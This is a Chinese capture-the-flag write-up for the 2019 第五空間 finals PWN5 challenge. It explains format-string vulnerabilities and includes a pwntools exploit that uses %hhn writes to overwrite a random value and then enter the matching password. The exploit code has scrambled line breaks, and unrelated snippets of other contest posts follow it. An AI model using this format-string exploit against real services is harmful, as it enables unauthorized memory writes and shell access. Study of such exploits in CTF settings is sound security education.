第五空間2019 決賽 PWN5

格式化漏洞講解：　　

%x是吧資料以16進製制輸出

%n是把已經輸出的字元數目輸入傳來引數的位址中，這就可以使我們修改資料

格式 ： %12$x    可以直接定位到地12個引數   其他%p,%s,%%n等類似

一般來說 先輸入 'aaaa %08x %08x %08x %08x %08x.....'來判斷我們輸入首位址的偏移 (找到41414141就是aaaa)

繼而就可以任意修改棧上的資料

看題目

明顯的格式化漏洞

因為這個unk_804c044從伺服器讀入，無法知道其內容，所以使用%n將其資料修改，隨後passwd輸入相同的資料即可

from pwn import *# io=process('

./pwn')
io=remote('
node3.buuoj.cn
',28876
)addr=0x0804c044
# base=10
payload=p32(addr)+p32(addr+1)+p32(addr+2)+p32(addr+3
)payload+='
%10$hhn%11$hhn%12$hhn%13$hhn
'io.sendline(payload)
payload=str(0x10101010
)io.sendline(payload)
io.interactive()

buuctf 第五空間2019 決賽 PWN5

一道格式化字串的題 先輸入aaaa 08x 08x 08x 08x 08x 08x 08x 08x 08x 08x 08x 08x 08x 來確定輸入首位址的偏移 找到41414141就是aaaa 之後只要修改隨機數的值，讓輸入和隨機數的值一樣就可以了 exp如下 from pwn import c...

第五屆決賽試題

小明和他的表弟一起去看電影，有人問他們的年齡。小明說 今年是我們的幸運年啊。我出生年份的四位數字加起來剛好是我的年齡。表弟的也是如此。已知今年是2014年，並且，小明說的年齡指的是周歲。請推斷並填寫出小明的出生年份。這是乙個4位整數，請通過瀏覽器提交答案，不要填寫任何多餘的內容 比如，他表弟的出生年...

第五屆藍橋決賽記

首先非常感謝老師，學院為我們付出的辛苦，有幸能夠獲得省賽一等進入決賽，學院出了巨大的資金支援我們去北京比賽，這次比賽我雖然沒有拿到一等獎，但我收穫了頗多經驗，得了三等，就像老師說的，大一不用著急，我有大把時間。但我想大把時間是有，可不能隨便拿來浪費。下邊來講講題目，考試時我發現前5題十分簡單，不過我...